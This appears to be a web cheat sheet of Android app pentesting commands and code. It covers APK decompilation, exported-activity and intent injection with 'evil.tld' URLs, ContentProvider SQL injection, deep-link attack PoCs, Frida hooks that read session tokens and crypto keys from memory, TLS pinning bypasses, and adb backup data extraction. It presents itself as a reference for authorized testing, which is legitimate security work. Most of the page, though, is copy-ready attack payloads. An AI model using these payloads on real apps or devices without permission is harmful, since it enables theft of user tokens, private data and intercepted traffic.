Android App Security Testing Cheat Sheet

Android application pentesting reference — APK decompilation with apktool and jadx, Frida runtime hooking, SSL/TLS pinning bypass, exported component and intent abuse, deep link / App Links testing, and Keystore inspection. (47 payloads)

Try it interactively with the Secret Scanner

APK Acquisition & Unpacking

(7)

adb shell pm path com.target.app

Find the on-device APK path for an installed package (returns split APKs too)Modern apps ship as App Bundles, so expect base.apk plus split_config.*.apk

adb pull /data/app/~~xQ../com.target.app-1/base.apk ./base.apk

Pull the APK off the device for offline analysisUse the exact path printed by 'pm path'; the hashed dir name changes per install

apktool d base.apk -o out/

Decode resources, AndroidManifest.xml, and smali (disassembled Dalvik) into a working treeBest for editing/rebuilding; gives readable manifest + smali, not Java

apktool b out/ -o patched.apk

Rebuild a modified app tree back into an APK after smali editsRebuilt APKs are unsigned — you must zipalign + apksigner before install

jadx -d jadx-out/ base.apk # or: jadx-gui base.apk

Decompile DEX to readable Java; GUI adds search, xrefs, and deobfuscationjadx-gui is the fastest way to grep logic and follow method cross-references

unzip -o base.apk -d unzipped/ && ls unzipped/lib/

Inspect bundled native .so libraries and asset files per-ABI (arm64-v8a, etc.)Native code often hides crypto/keys; flutter apps put logic in libapp.so

d2j-dex2jar.sh classes.dex -o app.jar

Convert DEX to a JAR for JD-GUI / Bytecode Viewer when jadx chokes on obfuscationUseful fallback when jadx fails to decompile heavily obfuscated classes

Static Analysis — Manifest & Secrets

(7)

grep -nE 'android:exported="true"' out/AndroidManifest.xml

List exported activities/services/receivers/providers reachable by other appsOn API 31+ any component with an intent-filter must set exported explicitly — review every one

grep -nE 'android:debuggable="true"|usesCleartextTraffic="true"|allowBackup="true"' out/AndroidManifest.xml

Flag debuggable builds, cleartext HTTP, and backup-extractable datadebuggable lets run-as read app data; allowBackup lets 'adb backup' exfiltrate it

Hunt hardcoded credentials, API keys, and tokens across decompiled source and resourcesAIza... = Google API key; check strings.xml, BuildConfig, and assets/

apkleaks -f base.apk

Automated regex sweep for URLs, secrets, S3 buckets, and Firebase endpointsFast first pass; always validate hits manually to weed out false positives

grep -rn 'network_security_config' out/AndroidManifest.xml && cat out/res/xml/network_security_config.xml

Read the Network Security Config to see pinned domains and trust anchorsTells you which domains are pinned and whether user CAs are trusted

grep -rniE 'firebaseio\.com|firebasedatabase\.app' jadx-out/ unzipped/

Find Firebase RTDB URLs — test '<db>.firebaseio.com/.json' for open read/writeMisconfigured Firebase rules are a classic mobile-to-backend data exposure

semgrep --config p/mobsfscan jadx-out/ # or run mobsf on the APK

Rule-based SAST for insecure crypto, WebView misuse, and exported component flawsMobSF gives a full static report; mobsfscan/semgrep is the CI-friendly subset

ADB & Component / Intent Abuse

(7)

adb shell am start -n com.target.app/.AdminActivity

Launch an exported activity directly, skipping the app's normal auth flowClassic broken-access-control: reach internal screens without logging in

adb shell am start -n com.target.app/.WebActivity --es url 'https://evil.tld'

Pass attacker-controlled extras into an exported activity (intent injection)If the activity loads the extra into a WebView you may get XSS/exfil or token theft

adb shell am broadcast -a com.target.app.ACTION_SYNC --es token AAA

Fire an exported BroadcastReceiver with forged extrasReceivers that act on untrusted broadcasts enable privilege/state manipulation

adb shell content query --uri content://com.target.app.provider/users

Read an exported ContentProvider — may dump DB rows without authenticationTry sub-paths and append '/../' for path-traversal into other provider tables

adb shell content query --uri content://com.target.app.provider/users --where "id='1' OR '1'='1'"

SQL-injection a ContentProvider's selection clause to bypass row filteringProviders backed by SQLiteDatabase.query() are frequently injectable

drozer console connect then: run app.activity.info -a com.target.app

Enumerate exported attack surface (activities, providers, services) with drozerdrozer's app.provider.* modules automate provider read/inject/traversal testing

adb shell run-as com.target.app cat /data/data/com.target.app/shared_prefs/*.xml

Read app-private SharedPreferences/DB on a debuggable buildOften stores session tokens, PINs, and 'remember me' creds in plaintext

Deep Links & App Links

(6)

adb shell dumpsys package com.target.app | grep -A3 -iE 'Schemes|Authorities|android.intent.action.VIEW'

Enumerate registered URI schemes, hosts, and VIEW intent-filtersMaps the deep-link attack surface — every scheme/host is a remote entry point

adb shell am start -W -a android.intent.action.VIEW -d 'targetapp://reset?token=ATTACKER'

Trigger a custom-scheme deep link with attacker-supplied parametersTest for auth bypass, open-redirect-to-WebView, and unvalidated token handling

adb shell am start -a android.intent.action.VIEW -d 'https://target.com/pay?amount=1'

Exercise an Android App Link (verified https deep link) with tampered valuesApp Links are autoVerify https; weak param validation = business-logic abuse

curl -s https://target.com/.well-known/assetlinks.json | jq .

Read Digital Asset Links to confirm which package/cert is authorized for App LinksMissing/misconfigured assetlinks.json lets a malicious app hijack the https links

adb shell am start -a android.intent.action.VIEW -d 'targetapp://webview?url=https://evil.tld/x.html'

Probe deep-link-to-WebView flows for arbitrary URL loading / JS-bridge exposureIf addJavascriptInterface is exposed, arbitrary URL load can reach native methods

Build a clickable PoC: <a href="targetapp://reset?token=ATTACKER">tap</a>

Demonstrate remote exploitation — a web page can invoke deep links with no app interaction prompt for custom schemesPairs well with intent-injection findings to show real-world impact in a report

Frida — Runtime Instrumentation

(7)

frida-ps -Uai # list installed/running apps on the USB device

Confirm frida-server is reachable and find the spawn identifierPush the matching-arch frida-server to /data/local/tmp and run it as root first

frida -U -f com.target.app -l hook.js --no-pause

Spawn the app under Frida and inject a script at launch (before pinning runs)-f spawns (early hook); use '-U -n com.target.app' to attach to a running process

Java.perform(function(){ var c=Java.use('com.target.app.Crypto'); c.encrypt.implementation=function(s){ console.log('[+] enc input:',s); return this.encrypt(s); }; });

Hook a Java method to log arguments and tamper with return values at runtimeCore pattern — overload-aware hooking reveals plaintext before encryption

Java.choose('com.target.app.Session', { onMatch:function(o){ console.log('token=', o.token.value); }, onComplete:function(){} });

Scan the heap for live instances and read their private fieldsGreat for ripping session tokens/keys out of objects already in memory

frida -U -n com.target.app --runtime=v8 -l rootbypass.js

Load anti-root / anti-tamper / emulator-detection bypass hooksobjection's 'android root disable' covers common RootBeer / build-prop checks

objection -g com.target.app explore then: android hooking watch class com.target.app.Login

Watch all methods of a class (args + returns) without writing a scriptobjection wraps Frida — fast for enumerating which methods touch sensitive data

android keystore list (inside objection)

Enumerate AndroidKeyStore aliases the app created at runtimeReveals key aliases, then 'android keystore watch' logs Keystore API calls

SSL/TLS Pinning Bypass

(6)

frida -U -f com.target.app -l frida-multiple-unpinning.js --no-pause

Drop-in script (httptoolkit/Frida CodeShare) that defeats OkHttp, TrustManager, Conscrypt, and moreFirst thing to try — covers the vast majority of OkHttp/Java pinning

objection -g com.target.app explore then: android sslpinning disable

Disable common pinning implementations with one command via FridaQuick win when you don't want to manage a standalone script

<network-security-config><base-config><trust-anchors><certificates src="user"/></trust-anchors></base-config></network-security-config>

Patch NSC to trust user-installed CAs, then repackage with apktoolWorks for non-pinned apps on API 24+ that ignore the user trust store by default

openssl x509 -inform DER -in burp.der -out burp.pem  && hash=$(openssl x509 -inform PEM -subject_hash_old -in burp.pem | head -1) && adb push burp.pem /system/etc/security/cacerts/$hash.0

Install Burp's CA as a system-trusted root (rooted device) to defeat user-CA exclusionsNeeded since API 24, apps don't trust user CAs unless configured; remount /system rw first

Java.use('okhttp3.CertificatePinner').check.overload('java.lang.String','java.util.List').implementation=function(){ return; };

Targeted OkHttp CertificatePinner.check() neutralization when generic scripts miss itUse when an app wraps OkHttp oddly or strips it — hook the exact overload

adb shell settings put global http_proxy 192.168.1.50:8080 (or use Wi-Fi proxy / adb reverse tcp:8080 tcp:8080)

Route device traffic to Burp/mitmproxy before attacking the pinning layerPinning bypass is pointless until intercepting; clear with 'http_proxy :0' after

Local Storage, Keystore & Crypto

(7)

adb shell run-as com.target.app sqlite3 databases/app.db '.tables' '.dump'

Dump app SQLite databases looking for tokens, PII, and cached responsesSQLCipher-encrypted DBs need the key — hook the open() call with Frida to recover it

adb backup -f data.ab com.target.app && dd if=data.ab bs=1 skip=24 | zlib-flate -uncompress | tar xvf -

Exfiltrate app data via Android Backup when allowBackup="true"Pre-API-31 vector; demonstrates data-at-rest exposure without root

Hook javax.crypto.spec.SecretKeySpec.$init and Cipher.doFinal with Frida

Recover symmetric keys/IVs and observe plaintext passed to crypto routinesReveals hardcoded keys and ECB/static-IV misuse that break EncryptedSharedPreferences claims

Check KeyGenParameterSpec: setUserAuthenticationRequired / setInvalidatedByBiometricEnrollment

Audit how AndroidKeyStore keys are protected — auth-bound vs. freely usableKeys without setUserAuthenticationRequired can be used by any code in the app process

keytool -list -printcert -jarfile base.apk (or: apksigner verify --print-certs base.apk)

Read the APK signing certificate (SHA-256 fingerprint, signature scheme version)Match against assetlinks.json/SafetyNet; v1-only signing is downgrade-attackable

grep -rniE 'MODE_WORLD_READABLE|MODE_WORLD_WRITEABLE|getExternalFilesDir|getExternalStorage' jadx-out/

Find world-readable prefs and sensitive writes to shared external storageExternal storage is readable by other apps/users — sensitive files there leak

Inspect EncryptedSharedPreferences / Jetpack Security usage vs. plain getSharedPreferences

Confirm sensitive prefs actually use Tink-backed encryption, not plaintext XMLMany apps ship the library but still write tokens with plain SharedPreferences

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

JWT Attacks Cheat Sheet Post-Exploitation Cheat Sheet API Security Cheat Sheet Mobile Security Cheat Sheet

Frequently asked questions

What is the Android App Security Testing Cheat Sheet?+

It's a quick-reference collection of 47 Android Apps payloads for testing Android App Security Testing vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Android Apps payloads?+

Copy any payload straight into your authorized test, or use the Secret Scanner to apply them interactively. Only test systems you have explicit permission to assess.

Are these Android Apps payloads free to use?+

Yes — this cheat sheet and all Android Apps payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Android App Security Testing Cheat Sheet?+

How do I use these Android Apps payloads?+

Copy any payload straight into your authorized test, or use the Secret Scanner to apply them interactively. Only test systems you have explicit permission to assess.

Are these Android Apps payloads free to use?+

Yes — this cheat sheet and all Android Apps payloads are completely free, with no account required. Everything runs in your browser.

Android App Security Testing Cheat Sheet

APK Acquisition & Unpacking

Static Analysis — Manifest & Secrets

ADB & Component / Intent Abuse

Deep Links & App Links

Frida — Runtime Instrumentation

SSL/TLS Pinning Bypass

Local Storage, Keystore & Crypto

Related Tools

Related Cheat Sheets

Frequently asked questions

Android App Security Testing Cheat Sheet

APK Acquisition & Unpacking

Static Analysis — Manifest & Secrets

ADB & Component / Intent Abuse

Deep Links & App Links

Frida — Runtime Instrumentation

SSL/TLS Pinning Bypass

Local Storage, Keystore & Crypto

Related Tools

Related Cheat Sheets

Frequently asked questions